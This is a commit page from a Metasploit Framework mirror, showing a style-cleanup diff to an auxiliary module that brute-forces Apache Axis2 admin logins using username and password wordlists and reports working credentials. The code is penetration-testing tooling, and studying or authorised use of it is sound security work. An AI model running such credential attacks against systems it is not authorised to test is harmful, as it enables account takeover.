infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Style compliance

bug/bundler_fix
James Lee 2014-05-28 14:31:34 -05:00
parent 3ac2182984
commit 05e24326a6
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
1 changed files with 16 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/auxiliary/scanner/http/axis_login.rb
View File

@ -17,10 +17,12 @@ class Metasploit3 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Apache Axis2 v1.4.1 Brute Force Utility', 'Name' => 'Apache Axis2 Brute Force Utility',
'Description' => %q{This module attempts to login to an Apache Axis2 v1.4.1 'Description' => %q{
instance using username and password combindations indicated by the USER_FILE, This module attempts to login to an Apache Axis2 instance using
PASS_FILE, and USERPASS_FILE options. username and password combindations indicated by the USER_FILE,
PASS_FILE, and USERPASS_FILE options. It has been verified to
work on at least versions 1.4.1 and 1.6.2.
}, },
'Author' => 'Author' =>
[ [
@ -35,8 +37,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options( register_options( [
[ Opt::RPORT(8080), Opt::RPORT(8080),
OptString.new('URI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']), OptString.new('URI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),
], self.class) ], self.class)
end end
@ -49,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Verifying login exists at #{target_url}") print_status("Verifying login exists at #{target_url}")
begin begin
res = send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => datastore['URI'] 'uri' => datastore['URI']
}, 20) }, 20)
@ -77,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
'data' => post_data, 'data' => post_data,
}, 20) }, 20)
if (res and res.code == 200 and res.body.to_s.match(/upload/) != nil) if res && res.code == 200 && res.body.to_s.match(/upload/) != nil
print_good("#{target_url} - Apache Axis - SUCCESSFUL login for '#{user}' : '#{pass}'") print_good("#{target_url} - Apache Axis - SUCCESSFUL login for '#{user}' : '#{pass}'")
report_auth_info( report_auth_info(
:host => rhost, :host => rhost,
@ -91,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
:active => true :active => true
) )
elsif(res and res.code == 200) elsif res && res.code == 200
vprint_error("#{target_url} - Apache Axis - Failed to login as '#{user}'") vprint_error("#{target_url} - Apache Axis - Failed to login as '#{user}'")
else else
vprint_error("#{target_url} - Apache Axis - Unable to authenticate.") vprint_error("#{target_url} - Apache Axis - Unable to authenticate.")